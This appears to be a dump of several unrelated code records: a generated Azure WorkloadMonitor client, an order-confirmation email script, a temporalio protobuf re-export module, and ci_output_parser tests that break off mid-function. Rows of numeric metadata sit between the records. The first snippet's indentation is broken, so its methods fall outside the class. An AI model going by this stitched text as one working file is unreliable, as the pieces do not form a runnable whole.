    # response headers dict, and may transform the return value.
    ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class MonitorsOperations(object):
"""MonitorsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~workload_monitor_api.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
    """Store the pipeline client, configuration, and (de)serializers for later requests."""
    self._client, self._config = client, config
    self._serialize, self._deserialize = serializer, deserializer
def list(
    self,
    subscription_id,  # type: str
    resource_group_name,  # type: str
    resource_namespace,  # type: str
    resource_type,  # type: str
    resource_name,  # type: str
    filter=None,  # type: Optional[str]
    expand=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.MonitorList"]
    """Get list of a monitors of a resource (with optional filter).

    Get list of a monitors of a resource (with optional filter).

    :param subscription_id: The subscriptionId of the resource.
    :type subscription_id: str
    :param resource_group_name: The resourceGroupName of the resource.
    :type resource_group_name: str
    :param resource_namespace: The resourceNamespace of the resource.
    :type resource_namespace: str
    :param resource_type: The resourceType of the resource.
    :type resource_type: str
    :param resource_name: The resourceType of the resource.
    :type resource_name: str
    :param filter: list example: $filter=monitorName eq 'logical-disks|C:|disk-free-space-mb';
     history example: $filter=isHeartbeat eq false.
    :type filter: str
    :param expand: ex: $expand=evidence,configuration.
    :type expand: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either MonitorList or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~workload_monitor_api.models.MonitorList]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MonitorList"]
    # Default HTTP-status -> exception mapping; callers may extend/override it
    # by passing their own 'error_map' in kwargs.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-01-13-preview"
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the HTTP request for one page. With no next_link this is the
        # first page (full URL template + query string); otherwise the service
        # supplied a complete continuation URL and only headers are re-sent.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list.metadata['url']  # type: ignore
            path_format_arguments = {
                'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
                'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
                'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters; optional query args are sent only when set.
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            if filter is not None:
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page; returns (continuation token or None, item iterator).
        deserialized = self._deserialize('MonitorList', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Execute the request for one page and fail fast on non-200 responses.
        request = prepare_request(next_link)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            error = self._deserialize(models.DefaultError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        return pipeline_response

    # ItemPaged drives get_next/extract_data lazily as the caller iterates.
    return ItemPaged(
        get_next, extract_data
    )
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors'}  # type: ignore
def get(
    self,
    subscription_id,  # type: str
    resource_group_name,  # type: str
    resource_namespace,  # type: str
    resource_type,  # type: str
    resource_name,  # type: str
    monitor_id,  # type: str
    expand=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> "models.Monitor"
    """Get the current status of a monitor of a resource.

    Get the current status of a monitor of a resource.

    :param subscription_id: The subscriptionId of the resource.
    :type subscription_id: str
    :param resource_group_name: The resourceGroupName of the resource.
    :type resource_group_name: str
    :param resource_namespace: The resourceNamespace of the resource.
    :type resource_namespace: str
    :param resource_type: The resourceType of the resource.
    :type resource_type: str
    :param resource_name: The resourceType of the resource.
    :type resource_name: str
    :param monitor_id: The monitorId of the resource (url encoded).
    :type monitor_id: str
    :param expand: ex: $expand=evidence,configuration.
    :type expand: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: Monitor, or the result of cls(response)
    :rtype: ~workload_monitor_api.models.Monitor
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.Monitor"]
    # HTTP-status -> exception mapping; extendable through kwargs['error_map'].
    error_map = {401: ClientAuthenticationError,
                 404: ResourceNotFoundError,
                 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-01-13-preview"
    accept = "application/json"

    # Expand the URL template with the url-encoded path parameters.
    serialize_url = self._serialize.url
    path_format_arguments = {
        'subscriptionId': serialize_url("subscription_id", subscription_id, 'str'),
        'resourceGroupName': serialize_url("resource_group_name", resource_group_name, 'str'),
        'resourceNamespace': serialize_url("resource_namespace", resource_namespace, 'str'),
        'resourceType': serialize_url("resource_type", resource_type, 'str'),
        'resourceName': serialize_url("resource_name", resource_name, 'str'),
        'monitorId': serialize_url("monitor_id", monitor_id, 'str'),
    }
    url = self._client.format_url(self.get.metadata['url'], **path_format_arguments)  # type: ignore

    # Query string (optional $expand sent only when provided) and headers.
    query_parameters = {
        'api-version': self._serialize.query("api_version", api_version, 'str'),
    }  # type: Dict[str, Any]
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
    header_parameters = {
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        # map_error raises for mapped codes; anything else becomes HttpResponseError
        # carrying the service's DefaultError payload.
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.DefaultError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('Monitor', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}'}  # type: ignore
def list_state_changes(
    self,
    subscription_id,  # type: str
    resource_group_name,  # type: str
    resource_namespace,  # type: str
    resource_type,  # type: str
    resource_name,  # type: str
    monitor_id,  # type: str
    filter=None,  # type: Optional[str]
    expand=None,  # type: Optional[str]
    start_timestamp_utc=None,  # type: Optional[datetime.datetime]
    end_timestamp_utc=None,  # type: Optional[datetime.datetime]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.MonitorStateChangeList"]
    """Get history of a monitor of a resource (with optional filter).

    Get history of a monitor of a resource (with optional filter).

    :param subscription_id: The subscriptionId of the resource.
    :type subscription_id: str
    :param resource_group_name: The resourceGroupName of the resource.
    :type resource_group_name: str
    :param resource_namespace: The resourceNamespace of the resource.
    :type resource_namespace: str
    :param resource_type: The resourceType of the resource.
    :type resource_type: str
    :param resource_name: The resourceType of the resource.
    :type resource_name: str
    :param monitor_id: The monitorId of the resource (url encoded).
    :type monitor_id: str
    :param filter: list example: $filter=monitorName eq 'logical-disks|C:|disk-free-space-mb';
     history example: $filter=isHeartbeat eq false.
    :type filter: str
    :param expand: ex: $expand=evidence,configuration.
    :type expand: str
    :param start_timestamp_utc: The start Timestamp for the desired history.
    :type start_timestamp_utc: ~datetime.datetime
    :param end_timestamp_utc: The end Timestamp for the desired history.
    :type end_timestamp_utc: ~datetime.datetime
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either MonitorStateChangeList or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~workload_monitor_api.models.MonitorStateChangeList]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MonitorStateChangeList"]
    # Default HTTP-status -> exception mapping; callers may extend/override it
    # by passing their own 'error_map' in kwargs.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-01-13-preview"
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the HTTP request for one page. With no next_link this is the
        # first page (full URL template + query string); otherwise the service
        # supplied a complete continuation URL and only headers are re-sent.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_state_changes.metadata['url']  # type: ignore
            path_format_arguments = {
                'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
                'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
                'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
                'monitorId': self._serialize.url("monitor_id", monitor_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters; optional query args are sent only when set.
            # Timestamps are serialized as ISO-8601 strings.
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            if filter is not None:
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
            if start_timestamp_utc is not None:
                query_parameters['startTimestampUtc'] = self._serialize.query("start_timestamp_utc", start_timestamp_utc, 'iso-8601')
            if end_timestamp_utc is not None:
                query_parameters['endTimestampUtc'] = self._serialize.query("end_timestamp_utc", end_timestamp_utc, 'iso-8601')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page; returns (continuation token or None, item iterator).
        deserialized = self._deserialize('MonitorStateChangeList', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Execute the request for one page and fail fast on non-200 responses.
        request = prepare_request(next_link)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            error = self._deserialize(models.DefaultError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        return pipeline_response

    # ItemPaged drives get_next/extract_data lazily as the caller iterates.
    return ItemPaged(
        get_next, extract_data
    )
list_state_changes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}/history'}  # type: ignore
def get_state_change(
    self,
    subscription_id,  # type: str
    resource_group_name,  # type: str
    resource_namespace,  # type: str
    resource_type,  # type: str
    resource_name,  # type: str
    monitor_id,  # type: str
    timestamp_unix,  # type: str
    expand=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MonitorStateChange"
    """Get the status of a monitor at a specific timestamp in history.

    :param subscription_id: The subscriptionId of the resource.
    :type subscription_id: str
    :param resource_group_name: The resourceGroupName of the resource.
    :type resource_group_name: str
    :param resource_namespace: The resourceNamespace of the resource.
    :type resource_namespace: str
    :param resource_type: The resourceType of the resource.
    :type resource_type: str
    :param resource_name: The resourceName of the resource.
    :type resource_name: str
    :param monitor_id: The monitorId of the resource (url encoded).
    :type monitor_id: str
    :param timestamp_unix: The timestamp of the state change (Unix format).
    :type timestamp_unix: str
    :param expand: ex: $expand=evidence,configuration.
    :type expand: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MonitorStateChange, or the result of cls(response)
    :rtype: ~workload_monitor_api.models.MonitorStateChange
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MonitorStateChange"]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-01-13-preview"
    accept = "application/json"

    # URL: serialize each path parameter into the metadata template.
    path_args = {
        'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'monitorId': self._serialize.url("monitor_id", monitor_id, 'str'),
        'timestampUnix': self._serialize.url("timestamp_unix", timestamp_unix, 'str'),
    }
    url = self._client.format_url(self.get_state_change.metadata['url'], **path_args)  # type: ignore

    # Query string: api-version always present, $expand only when requested.
    query = {}  # type: Dict[str, Any]
    query['api-version'] = self._serialize.query("api_version", api_version, 'str')
    if expand is not None:
        query['$expand'] = self._serialize.query("expand", expand, 'str')

    headers = {}  # type: Dict[str, Any]
    headers['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query, headers)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Anything other than 200 is surfaced as an ARM-formatted error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.DefaultError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MonitorStateChange', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_state_change.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}/history/{timestampUnix}'}  # type: ignore
| 49.967442
| 266
| 0.65289
| 2,309
| 21,486
| 5.886964
| 0.104374
| 0.039211
| 0.02825
| 0.025013
| 0.838226
| 0.834841
| 0.826675
| 0.814905
| 0.814905
| 0.814905
| 0
| 0.005485
| 0.244764
| 21,486
| 429
| 267
| 50.083916
| 0.832193
| 0.320069
| 0
| 0.780488
| 0
| 0.01626
| 0.153919
| 0.056328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044715
| false
| 0
| 0.04065
| 0
| 0.142276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b109a272de18300d316a05397d669cdde61677c
| 3,616
|
py
|
Python
|
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | null | null | null |
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | 48
|
2021-03-22T22:34:20.000Z
|
2021-05-05T15:55:33.000Z
|
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | null | null | null |
import smtplib
import os
import ssl
import app
def email_buyer(email_add, first, last, item, price, seller, location, time, address, country, state, zipcode):
    """Send an order-confirmation email to the buyer.

    When ``address`` is None the order is an in-person pickup and the mail
    lists the seller's location and time; otherwise the shipping details
    (address/state/zip/country) are listed instead.

    :param email_add: buyer's email address (message recipient)
    :param first: buyer's first name
    :param last: buyer's last name
    :param item: purchased item name
    :param price: purchase price
    :param seller: seller shown in the message
    :param location: pickup location (pickup orders only)
    :param time: pickup time (pickup orders only)
    :param address: shipping street address, or None for pickup orders
    :param country: shipping country
    :param state: shipping state
    :param zipcode: shipping zip code
    :raises smtplib.SMTPException: on login or delivery failure
    """
    PORT = 465  # SMTP-over-SSL; gmail requires port 465 for SSL
    # Gmail app password; login below will fail if this env var is unset.
    password = os.environ.get("D6_PASSWORD")
    SENDER_EMAIL = "exchange4studentsd6@gmail.com"
    SUBJECT = "Exchange4Students Order Confirmation"
    RECEIVER_EMAIL = email_add
    if address is None:
        TEXT = f"""
Dear {first} {last},
This is to confirm your purchase!
Below is your order information:
Item: {item}
Price: {price}
-----------------------------------------------------------
Seller: {seller}
Location: {location}
Time: {time}
-Exchange4Students
"""
    else:
        TEXT = f"""
Dear {first} {last},
This is to confirm your purchase!
Below is your order information:
Item: {item}
Price: {price}
-------------------------------------------------------------
Seller: {seller}
Address: {address}
State: {state}
Zipcode: {zipcode}
Country: {country}
-Exchange4Students
"""
    # Fix: the body previously began with its own "Subject: Order Confirmation"
    # line while MESSAGE prepends the real Subject header below, so the
    # delivered mail showed the subject twice. The header here is now the
    # single source of the subject.
    MESSAGE = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
    # Create a secure SSL context
    context = ssl.create_default_context()
    with smtplib.SMTP_SSL("smtp.gmail.com", PORT, context=context) as server:
        server.login(SENDER_EMAIL, password)
        server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, MESSAGE)
def email_seller(seller, buyer_first, buyer_last, venmo, buyer_email, item, location,
                 time, address, country, state, zipcode):
    """Notify the seller that one of their items has been bought.

    When ``address`` is None the order is an in-person pickup and the mail
    lists the agreed location and time; otherwise the buyer's shipping
    details (address/state/zip/country) are listed instead.

    :param seller: seller's email address (message recipient)
    :param buyer_first: buyer's first name
    :param buyer_last: buyer's last name
    :param venmo: buyer's venmo handle for payment
    :param buyer_email: buyer's contact email shown in the message
    :param item: purchased item name
    :param location: pickup location (pickup orders only)
    :param time: pickup time (pickup orders only)
    :param address: shipping street address, or None for pickup orders
    :param country: shipping country
    :param state: shipping state
    :param zipcode: shipping zip code
    :raises smtplib.SMTPException: on login or delivery failure
    """
    PORT = 465  # SMTP-over-SSL; gmail requires port 465 for SSL
    # Gmail app password; login below will fail if this env var is unset.
    password = os.environ.get("D6_PASSWORD")
    SENDER_EMAIL = "exchange4studentsd6@gmail.com"
    SUBJECT = "Exchange4Students Order Confirmation"
    RECEIVER_EMAIL = seller
    if address is None:
        TEXT = f"""
Dear user,
Someone bought your item!
Below is the order information:
Item: {item}
Buyer Name: {buyer_first} {buyer_last}
Email: {buyer_email}
Venmo: {venmo}
Location: {location}
Time: {time}
Sincerely,
Exchange4students
"""
    else:
        TEXT = f"""
Dear user,
Someone bought your item!
Below is the order information:
Item: {item}
Buyer Name: {buyer_first} {buyer_last}
Email: {buyer_email}
Venmo: {venmo}
Address: {address}
State: {state}
Zipcode: {zipcode}
Country: {country}
Sincerely,
Exchange4students
"""
    # Fix: the body previously began with its own "Subject: Order Confirmation"
    # line while MESSAGE prepends the real Subject header below, so the
    # delivered mail showed the subject twice. The header here is now the
    # single source of the subject.
    MESSAGE = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
    # Create a secure SSL context
    context = ssl.create_default_context()
    with smtplib.SMTP_SSL("smtp.gmail.com", PORT, context=context) as server:
        server.login(SENDER_EMAIL, password)
        server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, MESSAGE)
| 27.603053
| 111
| 0.536504
| 356
| 3,616
| 5.36236
| 0.216292
| 0.025144
| 0.020953
| 0.027239
| 0.869565
| 0.869565
| 0.869565
| 0.869565
| 0.815086
| 0.815086
| 0
| 0.011785
| 0.34292
| 3,616
| 130
| 112
| 27.815385
| 0.791667
| 0.061947
| 0
| 0.876404
| 0
| 0
| 0.63682
| 0.06974
| 0
| 0
| 0
| 0.007692
| 0
| 1
| 0.022472
| false
| 0.044944
| 0.044944
| 0
| 0.067416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b5515b48f6853b1078b277bdd2f191487995f57
| 782
|
py
|
Python
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 55
|
2022-01-31T22:02:22.000Z
|
2022-03-30T11:17:21.000Z
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 7
|
2022-02-04T14:08:46.000Z
|
2022-03-22T13:27:30.000Z
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 4
|
2022-01-31T17:31:49.000Z
|
2022-03-29T01:04:46.000Z
|
# Public re-exports of the error-detail failure messages from the generated
# protobuf module (the `_pb2` suffix is the protoc naming convention).
from .message_pb2 import (
    CancellationAlreadyRequestedFailure,
    ClientVersionNotSupportedFailure,
    NamespaceAlreadyExistsFailure,
    NamespaceNotActiveFailure,
    NotFoundFailure,
    PermissionDeniedFailure,
    QueryFailedFailure,
    ResourceExhaustedFailure,
    ServerVersionNotSupportedFailure,
    SystemWorkflowFailure,
    WorkflowExecutionAlreadyStartedFailure,
)
# Keep __all__ in sync with the import list above so that star-imports and
# API docs expose exactly the generated failure types.
__all__ = [
    "CancellationAlreadyRequestedFailure",
    "ClientVersionNotSupportedFailure",
    "NamespaceAlreadyExistsFailure",
    "NamespaceNotActiveFailure",
    "NotFoundFailure",
    "PermissionDeniedFailure",
    "QueryFailedFailure",
    "ResourceExhaustedFailure",
    "ServerVersionNotSupportedFailure",
    "SystemWorkflowFailure",
    "WorkflowExecutionAlreadyStartedFailure",
]
| 27.928571
| 45
| 0.782609
| 27
| 782
| 22.481481
| 0.592593
| 0.220758
| 0.31631
| 0.398682
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0
| 0.001511
| 0.153453
| 782
| 27
| 46
| 28.962963
| 0.915408
| 0
| 0
| 0
| 0
| 0
| 0.373402
| 0.331202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8ea85bdedcf33b83900f9de3aa54e5f79da03f83
| 6,929
|
py
|
Python
|
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
import pytest
from ci_output_parser import formatter
def test_format_lint_lines_with_valid_line(valid_lint_lines, valid_lint_format):
    """Full output: prior log lines, then title banner, then lint block."""
    produced = formatter.format_lint_lines(
        valid_lint_format.get("parser_name"),
        [valid_lint_lines.get("doxygen_lint")],
        valid_lint_lines.get("cmake_lint"),
    )
    assert len(produced) == 9
    assert produced[0] == valid_lint_lines.get("cmake_lint")[0]
    expected_tail = {
        3: valid_lint_format.get("header_divider"),
        4: valid_lint_format.get("parser_name_formatted"),
        5: valid_lint_format.get("header_divider"),
        6: valid_lint_format.get("lint_comment_block"),
        7: valid_lint_lines.get("doxygen_lint"),
        8: valid_lint_format.get("lint_comment_block"),
    }
    for index, value in expected_tail.items():
        assert produced[index] == value
def test_format_lint_lines_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
    """With no prior log lines the output is just banner + lint block."""
    produced = formatter.format_lint_lines(
        valid_lint_format.get("parser_name"),
        [valid_lint_lines.get("doxygen_lint")],
        [],
    )
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("parser_name_formatted"),
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("doxygen_lint"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_lines_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
    """Omitting the log-lines argument behaves like passing an empty list."""
    produced = formatter.format_lint_lines(
        valid_lint_format.get("parser_name"),
        [valid_lint_lines.get("doxygen_lint")],
    )
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("parser_name_formatted"),
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("doxygen_lint"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_lines_with_no_parser_lint(valid_lint_lines, valid_lint_format):
    """No lint findings: the no-errors report fills the lint block."""
    produced = formatter.format_lint_lines(
        valid_lint_format.get("parser_name"), [], []
    )
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("parser_name_formatted"),
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("no_errors_report"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_lines_with_no_parser_name(valid_lint_lines, valid_lint_format):
    """Empty parser name falls back to the no-name banner."""
    produced = formatter.format_lint_lines("", [], [])
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("no_parser_name_formatted"),
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("no_errors_report"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_error_lines_with_valid_line(valid_lint_lines, valid_lint_format):
    """Error lines are appended as a comment block after existing log lines."""
    produced = formatter.format_lint_error_lines(
        [valid_lint_lines.get("doxygen_lint")],
        valid_lint_lines.get("cmake_lint"),
    )
    assert len(produced) == 6
    assert produced[0] == valid_lint_lines.get("cmake_lint")[0]
    expected_tail = {
        3: valid_lint_format.get("lint_comment_block"),
        4: valid_lint_lines.get("doxygen_lint"),
        5: valid_lint_format.get("lint_comment_block"),
    }
    for index, value in expected_tail.items():
        assert produced[index] == value
def test_format_lint_error_lines_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
    """With no prior log lines the output is just the fenced lint block."""
    produced = formatter.format_lint_error_lines(
        [valid_lint_lines.get("doxygen_lint")], []
    )
    assert produced == [
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("doxygen_lint"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_error_lines_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
    """Passing None for the log lines must raise rather than be coerced."""
    doxygen = valid_lint_lines.get("doxygen_lint")
    with pytest.raises(AttributeError):
        formatter.format_lint_error_lines([doxygen], None)
def test_format_lint_error_lines_with_no_parser_lint(valid_lint_lines, valid_lint_format):
    """No findings: the fenced block carries the no-errors report."""
    produced = formatter.format_lint_error_lines([], [])
    assert produced == [
        valid_lint_format.get("lint_comment_block"),
        valid_lint_lines.get("no_errors_report"),
        valid_lint_format.get("lint_comment_block"),
    ]
def test_format_lint_title_with_valid_parser_name_and_log_lines(valid_lint_lines, valid_lint_format):
    """Title banner is appended after the existing log lines."""
    produced = formatter.format_lint_title(
        valid_lint_format.get("parser_name"),
        valid_lint_lines.get("cmake_lint"),
    )
    assert len(produced) == 6
    assert produced[0] == valid_lint_lines.get("cmake_lint")[0]
    expected_tail = {
        3: valid_lint_format.get("header_divider"),
        4: valid_lint_format.get("parser_name_formatted"),
        5: valid_lint_format.get("header_divider"),
    }
    for index, value in expected_tail.items():
        assert produced[index] == value
def test_format_lint_title_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
    """With no prior log lines the output is only the title banner."""
    produced = formatter.format_lint_title(valid_lint_format.get("parser_name"), [])
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("parser_name_formatted"),
        valid_lint_format.get("header_divider"),
    ]
def test_format_lint_title_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
    """Passing None for the log lines must raise rather than be coerced."""
    parser_name = valid_lint_format.get("parser_name")
    with pytest.raises(AttributeError):
